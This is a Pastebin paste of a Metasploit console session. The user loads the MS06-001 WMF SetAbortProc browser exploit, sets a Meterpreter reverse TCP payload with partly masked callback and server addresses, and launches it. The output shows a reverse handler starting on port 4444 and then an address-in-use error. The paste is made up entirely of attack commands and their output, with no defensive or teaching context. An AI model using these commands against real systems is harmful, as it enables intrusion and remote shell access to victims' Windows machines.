Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =[ metasploit v3.6.0-release [core:3.6 api:1.0]
- + -- --=[ 648 exploits - 340 auxiliary
- + -- --=[ 216 payloads - 27 encoders - 8 nops
- msf exploit(ms06_001_wmf_setabortproc) > use exploit/windows/browser/ms06_001_wmf_setabortproc
- msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(ms06_001_wmf_setabortproc) > set LHOST 79.***
- LHOST => 79.***
- msf exploit(ms06_001_wmf_setabortproc) > set SRVHOST 85.***
- SRVHOST => 85.***
- msf exploit(ms06_001_wmf_setabortproc) > exploit
- [*] Exploit running as background job.
- [*] Started reverse handler on 79.***:4444
- [-] Exploit exception: The address is already in use (85.***:8080).
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement